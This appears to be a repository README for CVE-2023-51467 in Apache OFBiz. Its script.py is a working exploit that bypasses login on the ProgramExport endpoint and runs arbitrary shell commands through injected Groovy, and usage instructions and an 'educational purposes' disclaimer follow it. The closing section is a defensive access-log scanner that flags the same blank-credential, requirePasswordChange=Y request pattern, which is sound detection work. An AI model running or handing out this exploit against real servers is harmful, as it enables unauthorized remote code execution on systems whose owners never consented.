- CVE: CVE-2023-51467
- Severity: Critical (CVSS 9.8)
- Root cause: https://github.com/apache/ofbiz-framework/blob/0530a58d3a912520b7f9e46c5ccde98fd3737bf5/framework/webtools/src/main/groovy/org/apache/ofbiz/webtools/entity/ProgramExport.groovy#L90
- Mitigation: Upgrade Apache OFBiz
- Reference: https://issues.apache.org/jira/browse/OFBIZ-12873
File: script.py
```python
import requests
from bs4 import BeautifulSoup
import sys


def send_post_request(url, command):
    target_url = f"{url}/webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y"
    post_data = {"groovyProgram": f'def result = "{command}".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField("win3zz"+result);'}
    response = requests.post(target_url, data=post_data)
    if response.status_code == 200:
        print("Request successfully sent.")
        # Parse the HTML content
        soup = BeautifulSoup(response.text, 'html.parser')
        # Find the div with id="content-messages" and class="content-messages errorMessage"
        error_div = soup.find('div', {'id': 'content-messages', 'class': 'content-messages errorMessage'})
        if error_div:
            # Extract and print the text content of the div and its descendants
            error_text = error_div.get_text(strip=True)
            print("Error Message:")
            print(error_text)
        else:
            print("No error message found.")
    else:
        print(f"Error: {response.status_code} - {response.text}")


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: python script.py <url> <command>")
        sys.exit(1)
    url_arg = sys.argv[1]
    command_arg = sys.argv[2]
    send_post_request(url_arg, command_arg)
```
Make sure to install the `beautifulsoup4` library if you haven't already by running `pip install beautifulsoup4`.
To run the script, use the following command:
```
user@host:~/CVE-2023-51467$ python3 script.py <url> <command>
```
This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.
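For defenders, the request line built in script.py leaves a recognizable trace in web access logs. The following is an added example, not part of the original repository: it scans access-log lines for a query string carrying `requirePasswordChange=Y` together with a blank `USERNAME` or `PASSWORD`. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jan/2024:10:12:01 +0000] "POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 5123',
    '192.0.2.10 - - [05/Jan/2024:10:13:44 +0000] "GET /webtools/control/main HTTP/1.1" 200 9120',
    '192.0.2.10 - - [05/Jan/2024:10:14:02 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 200 4410',
    '203.0.113.9 - - [05/Jan/2024:10:15:30 +0000] "GET /webtools/control/ping?PASSWORD=&requirePasswordChange=Y&USERNAME= HTTP/1.1" 401 310',
    'not an access log line',
]

# Client IP, method, request target and status from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)


def inspect_line(line):
    """Return a finding dict if the line matches the query-string pattern, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None  # unparseable line: skipped, not flagged
    parts = urlsplit(m["target"])
    # keep_blank_values=True so that "USERNAME=" is kept as an empty string.
    params = parse_qs(parts.query, keep_blank_values=True)
    forced = "Y" in params.get("requirePasswordChange", [])
    blank = [n for n in ("USERNAME", "PASSWORD") if "" in params.get(n, [])]
    if not (forced and blank):
        return None
    return {
        "ip": m["ip"],
        "method": m["method"],
        "path": parts.path,
        "status": int(m["status"]),
        "blank_params": blank,
        # True when the request targets the endpoint named in the root-cause link.
        "program_export": parts.path.rstrip("/").endswith("/ProgramExport"),
    }


def scan(lines):
    """Inspect every line and return the findings in input order."""
    return [f for f in map(inspect_line, lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs normally record only the request line, so the same parameters sent in a POST body would not appear here and need body-aware logging or a WAF rule to catch.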